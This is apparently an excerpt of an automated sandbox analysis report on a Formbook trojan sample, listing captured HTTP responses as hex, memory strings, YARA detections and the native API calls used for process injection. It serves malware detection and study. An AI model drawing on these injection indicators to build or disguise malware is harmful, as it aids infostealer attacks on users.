2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:51:53 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 
34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:51:57 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 
2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:52:17 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:52:20 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:52:23 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:52:26 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 08 Dec 2023 13:52:32 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2023-12-08T13:52:37.4097576Z
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 08 Dec 2023 13:52:35 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 18 X-Rate-Limit-Reset: 2023-12-08T13:52:37.4097576Z
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 08 Dec 2023 13:52:38 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2023-12-08T13:52:43.0141623Z
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Fri, 08 Dec 2023 13:52:40 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2023-12-08T13:52:45.7508499Z
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Dec 2023 13:52:47 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Dec 2023 13:52:49 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Dec 2023 13:52:52 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Dec 2023 13:52:55 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Dec 2023 13:53:01 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Dec 2023 13:53:05 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 08 Dec 2023 13:53:07 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
            Source: UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/services/search-domains/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000534/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000572
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/110000580/
            Source: isoburn.exe, 00000004.00000002.4123491742.0000000007260000.00000004.00000800.00020000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.00000000064F0000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003F80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.nl/vragen/198/

            E-Banking Fraud

            Source: Yara match, File source: 2.2.WrrCV4QR2J.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.WrrCV4QR2J.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.WrrCV4QR2J.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 2.2.WrrCV4QR2J.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 0.2.WrrCV4QR2J.exe.2ea469c.3.raw.unpack, -Module-.cs, Large array initialization: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E: array initializer size 2192
            Source: 0.2.WrrCV4QR2J.exe.5ac0000.6.raw.unpack, -Module-.cs, Large array initialization: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E: array initializer size 2192
            Source: C:\Windows\SysWOW64\isoburn.exe, Process Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040A953 NtMapViewOfSection,2_2_0040A953
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040A123 NtSetContextThread,2_2_0040A123
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040B213 NtDelayExecution,2_2_0040B213
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040AB73 NtCreateFile,2_2_0040AB73
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040A323 NtResumeThread,2_2_0040A323
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00428453 NtClose,2_2_00428453
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00409D23 NtSuspendThread,2_2_00409D23
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040ADA3 NtReadFile,2_2_0040ADA3
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040B623 NtAllocateVirtualMemory,2_2_0040B623
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_00409F23 NtGetContextThread,2_2_00409F23
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_0040A733 NtCreateSection,2_2_0040A733
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2B60 NtClose,LdrInitializeThunk,2_2_015B2B60
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_015B2DF0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_015B2C70
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B35C0 NtCreateMutant,LdrInitializeThunk,2_2_015B35C0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B4340 NtSetContextThread,2_2_015B4340
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B4650 NtSuspendThread,2_2_015B4650
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2BF0 NtAllocateVirtualMemory,2_2_015B2BF0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2BE0 NtQueryValueKey,2_2_015B2BE0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2B80 NtQueryInformationFile,2_2_015B2B80
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2BA0 NtEnumerateValueKey,2_2_015B2BA0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2AD0 NtReadFile,2_2_015B2AD0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2AF0 NtWriteFile,2_2_015B2AF0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2AB0 NtWaitForSingleObject,2_2_015B2AB0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2D10 NtMapViewOfSection,2_2_015B2D10
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2D00 NtSetInformationFile,2_2_015B2D00
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2D30 NtUnmapViewOfSection,2_2_015B2D30
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2DD0 NtDelayExecution,2_2_015B2DD0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2DB0 NtEnumerateKey,2_2_015B2DB0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2C60 NtCreateKey,2_2_015B2C60
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2C00 NtQueryInformationProcess,2_2_015B2C00
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2CC0 NtQueryVirtualMemory,2_2_015B2CC0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2CF0 NtOpenProcess,2_2_015B2CF0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2CA0 NtQueryInformationToken,2_2_015B2CA0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2F60 NtCreateProcessEx,2_2_015B2F60
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2F30 NtCreateSection,2_2_015B2F30
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2FE0 NtCreateFile,2_2_015B2FE0
            Source: C:\Users\user\Desktop\WrrCV4QR2J.exeCode function: 2_2_015B2F90 NtProtectVirtualMemory,2_2_015B2F90
